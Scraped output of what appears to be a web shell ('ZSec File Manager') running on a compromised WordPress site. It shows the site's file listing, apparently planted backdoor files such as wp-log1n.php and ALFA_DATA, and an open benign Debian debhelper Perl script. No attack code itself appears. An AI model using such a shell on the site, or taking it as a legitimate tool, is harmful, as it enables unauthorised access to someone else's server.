ZSec File Manager
Upload
Current Directory: /home/aiessinternational.com/public_html
[Up]
..
[Open]
Hapus
Rename
.htaccess
[Edit]
Hapus
Rename
21cbfe
[Open]
Hapus
Rename
ALFA_DATA
[Open]
Hapus
Rename
advance
[Open]
Hapus
Rename
advance.zip
[Edit]
Hapus
Rename
ammika.php
[Edit]
Hapus
Rename
c8aa5
[Open]
Hapus
Rename
click.php
[Edit]
Hapus
Rename
defaults.php
[Edit]
Hapus
Rename
google41b982abb0d9ca3b.html
[Edit]
Hapus
Rename
index.php
[Edit]
Hapus
Rename
index.php0
[Edit]
Hapus
Rename
item.php
[Edit]
Hapus
Rename
license.txt
[Edit]
Hapus
Rename
mah.php
[Edit]
Hapus
Rename
networks.php
[Edit]
Hapus
Rename
options.php
[Edit]
Hapus
Rename
pages.php
[Edit]
Hapus
Rename
plugins.php
[Edit]
Hapus
Rename
product.php
[Edit]
Hapus
Rename
readme.html
[Edit]
Hapus
Rename
robots.txt
[Edit]
Hapus
Rename
saiga.php
[Edit]
Hapus
Rename
search.php
[Edit]
Hapus
Rename
web.config
[Edit]
Hapus
Rename
wp-activate.php
[Edit]
Hapus
Rename
wp-admin
[Open]
Hapus
Rename
wp-blog-header.php
[Edit]
Hapus
Rename
wp-comments-post.php
[Edit]
Hapus
Rename
wp-config-sample.php
[Edit]
Hapus
Rename
wp-config.php
[Edit]
Hapus
Rename
wp-content
[Open]
Hapus
Rename
wp-cron.php
[Edit]
Hapus
Rename
wp-includes
[Open]
Hapus
Rename
wp-links-opml.php
[Edit]
Hapus
Rename
wp-load.php
[Edit]
Hapus
Rename
wp-log1n.php
[Edit]
Hapus
Rename
wp-mail.php
[Edit]
Hapus
Rename
wp-settings.php
[Edit]
Hapus
Rename
wp-signup.php
[Edit]
Hapus
Rename
wp-trackback.php
[Edit]
Hapus
Rename
wp.php
[Edit]
Hapus
Rename
xmlrpc.php
[Edit]
Hapus
Rename
Edit File
#!/usr/bin/perl -w =head1 NAME dh_autoreconf_clean - Clean all changes made by dh_autoreconf =cut use strict; use Debian::Debhelper::Dh_Lib; =head1 SYNOPSIS B<dh_autoreconf_clean> [S<I<debhelper options>>] =head1 DESCRIPTION dh_autoreconf_clean removes all files which have been created or changed during the autoreconf call executed by L<dh_autoreconf(1)>. It also reverts any ltmain.sh patch applied by dh_autoreconf. =cut init(); # PROMISE: DH NOOP WITHOUT autoreconf.before autoreconf.after # autoreconf failed, just remove the 'before' file. if (-r 'debian/autoreconf.before' && ! -r 'debian/autoreconf.after') { doit("rm", "debian/autoreconf.before"); exit 0; } if (! -r 'debian/autoreconf.before' || ! -r 'debian/autoreconf.after') { exit 0; } # Mapping of filename => md5sum. my %file = (); # An array of the names of the files which should be removed. my @delete = (); # Read the old files in open(FILE, 'debian/autoreconf.before') or die($!); while(<FILE>) { chomp($_); my ($checksum, $filename) = split(' ', $_, 2); $file{$filename} = $checksum; } close(FILE); # Read the new files open(FILE, 'debian/autoreconf.after') or die($!); my $ltcheck = ""; while(<FILE>) { chomp($_); my ($checksum, $filename) = split(' ', $_, 2); if ($filename eq "/usr/share/libtool/build-aux/ltmain.sh") { $ltcheck = $checksum; } elsif ($filename eq "/usr/share/libtool/config/ltmain.sh") { $ltcheck = $checksum; } elsif (!defined($file{$filename}) || $file{$filename} ne $checksum) { # Remove non-excluded, changed files push @delete, $filename; } elsif ($checksum eq $ltcheck) { # A valid ltmain.sh, reverse patch doit("patch", "-R", "-f", "--no-backup-if-mismatch", "-i", "/usr/share/dh-autoreconf/ltmain-as-needed.diff", $filename); } } close(FILE); # Cleanup doit("rm", "-f", "--", @delete) if @delete; doit("rm", "-f", "debian/autoreconf.before", "debian/autoreconf.after"); =head1 SEE ALSO L<debhelper(7)>, L<dh_autoreconf(1)>, L<dh-autoreconf(7)> =head1 AUTHOR Julian Andres Klode <jak@debian.org> =cut
Simpan